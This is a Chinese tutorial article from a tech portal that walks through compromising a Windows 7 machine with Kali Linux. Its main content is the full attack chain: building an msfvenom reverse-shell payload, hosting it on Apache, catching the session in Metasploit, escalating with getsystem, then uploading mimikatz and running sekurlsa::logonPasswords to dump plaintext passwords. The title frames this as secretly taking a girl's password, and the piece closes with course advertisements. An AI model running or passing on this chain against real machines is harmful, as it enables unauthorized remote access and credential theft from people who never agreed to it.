您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

时间:2020-06-19 10:12:09  来源:  作者:

在kali渗透之内网渗透中,黑客都会想方设法在目标设备中获取重要的文件或资料,其中获得密码就是一件重要的事!小白学习白帽黑客kali渗透,前往下方专栏即可!

 

什么是mimikatz

之前课程讲解过,xp系统的SAM和SYSTEM文件是可以在备份文件repair中进行有权提取的,但是Win7系统并没有这个备份目录,更无法直接从system32/config下提取SAM和SYSTEM!

既然不能提取,我们就使用特殊的工具来直接打入目标系统中,进行越权提取!所以这里要用到法国小伙编写的一款神器mimikatz,将它上传到目标系统中,进而直接从目标系统中破解出明文密码!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

获得meterpreter会话

有人问,我都进入对方电脑了,还要密码干嘛?这里获得的密码有助于横向渗透,一般开机密码,是打开其他局域网电脑的钥匙,更是电脑某些服务的登陆密码,所以这些凭证很重要!

环境:

使用kali-2020,建议进入root!(输入su,输入密码即可!)

使用win7靶机

使用meterpreter建立的会话获得远程windows的SAM文件!

这种方式适用于测试的靶机已经运行了你的免杀木马可执行载荷,也就说使用我们的kali已经获得了靶机的meterpreter会话!

使用msfvenom生成windows有效载荷(一般木马),kali终端下输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.206 LPORT=8888 -f exe > test.exe

LHOST是你kali的桥接网络IP;LPORT随便设置,只要不和其他冲突即可。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

将主目录下生成的可执行木马载荷放到kali的/var/www/html中,并且删除html目录下.html为后缀的文件(没有就不用管!)

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

开启kali的Apache2服务,在终端中输入:

 service apache2 start

Apache2可以提供基本的web服务,也就是说远程的靶机可以访问kali的ip就可以自动访问kali的/va/www/html/下的文件,进行访问下载!Apache2此时就相当于一个小型服务器!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

win7靶机(桥接网络)浏览器访问:192.168.31.206,然后选中test.exe.进行下载到桌面。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

kali,启动metasploit工具,并设置监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.206
set lport 8888
run
内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

既然已经设置了监听,我们直接去win7模拟运行有效载荷test.exe,然后就会看到kali的metasploit就会收到会话!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

我们已经获得了win7靶机的meterpreter会话,现在我们可以通过一个meterpreter命令"hashdump"就可以直接下载win7靶机的hash文件,这里获取的不是被二次加密的SAM文件,而是自动获取win7被解密后的SAM文件形成的hash值!

但是我们首先需要看下当前获得的会话是什么权限?输入"getuid"

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

管理员权限,不是system权限,无法提取hash值,我们第一步就需要直接输入"getsystem"来使用meterpreter默认的技术进行win7提权!看看能不能变成system权限。执行完毕,输入getuid查看,已经是system权限!Bingo!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

知识补充,如果输入getsystem无法提权,这就需要其他的利用模块绕过win7的提权,这里暂时不讲,以后会讲解!

我们输入"hashdump",看看是否得到hash值

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

很不幸,没有得到我们想要的hash值,原因是部分win7系统拒绝metasploit进行访问提取hash!怎么办?我们继续试探!

上传mimikatz

既然直接输入hashdump不行,我们试试上传破解工具到win7靶机中进行远程抓取!

已经加入专栏课程《白帽黑客kali初学指南》的学员,可以直接在我们的专栏资料库中找到mimikatz!

没有加入的,可以点击>>《白帽黑客kali初学指南》加入专栏,然后私信@小白嘿客获取专栏资料库

这里提醒:根据目标系统的位数,请在资料库中选择不同版本的mimikatz!

上传命令是:

upload Win32 c:\
内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后在meterpreter中输入"shell"进入win7靶机的cmd终端模拟器。如果出现乱码,输入chcp 65001即可解决乱码。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

这里获得的cmd显示在对方的桌面中,我们应该切换到c盘根目录下,你发现cmd此时就在c:下,然后输入dir查看验证下远程的win7靶机c盘是否有我们上传上去的mimikatz工具!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

在cmd中输入"mimikatz.exe"远程启动我们的破解工具。

这里需要提醒,如果之前的meterpreter会话断开过,需要重新建立,而且要保证已经使用meterpreter的getsystem命令进行了本地对远程win7靶机的提权!否则mimikatz.exe可能无法运行,不过亲身尝梨知酸甜,还需要亲身实践哈!

输入"mimikatz.exe"运行我们的破解工具。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后输入privilege::debug,显示20 ok即可完成提权!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后输入sekurlsa::logonPasswords,开始远程抓取win7靶机的hash值!你会很开心的!看下图!

理论上会将win7靶机的所有用户以及密码都打印在meterpreter会话中的模拟cmd窗口中!我们这里只关注Administrator这个管理员用户!

你此时发现SHA1这种hash值根本就不用解密,红色的框中已经自动解密出密码123456,用户Administrator了!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

到此,我们利用meterpreter会话上传mimikatz工具到win7靶机上,然后在kali中实现操控靶机的cmd,成功破解出了明文口令!根本就不需要拿到hash值。

小白嘿客我想说

更多网络安全、白帽黑客入门到实战技术,可以前往下方专栏进行学习,你也能快速成为渗透大神!

→《从新手到web白帽黑客》,网站渗透侵入的深入浅出教程:

 

→《Android/ target=_blank class=infotextkey>安卓手机渗透测试》,将手机打造成功嘿客神器并渗透安卓手机:

 

→《网络安全训练营》,和众多kali爱好者一起交流、学习,还有更多技术干货:



Tags:mimikatz   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言在本篇文章中,主要介绍sid相关的概念,并介绍mimikatz的sid模块,着重分析sid::patch功能的原理。SID简介1. 安全标识符(SID)在Windows操作系统中,系统使用安全标识符来唯一...【详细内容】
2021-08-18  Tags: mimikatz  点击:(76)  评论:(0)  加入收藏
在kali渗透之内网渗透中,黑客都会想方设法在目标设备中获取重要的文件或资料,其中获得密码就是一件重要的事!小白学习白帽黑客kali渗透,前往下方专栏即可! 什么是mimikatz之前课...【详细内容】
2020-06-19  Tags: mimikatz  点击:(944)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross—Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条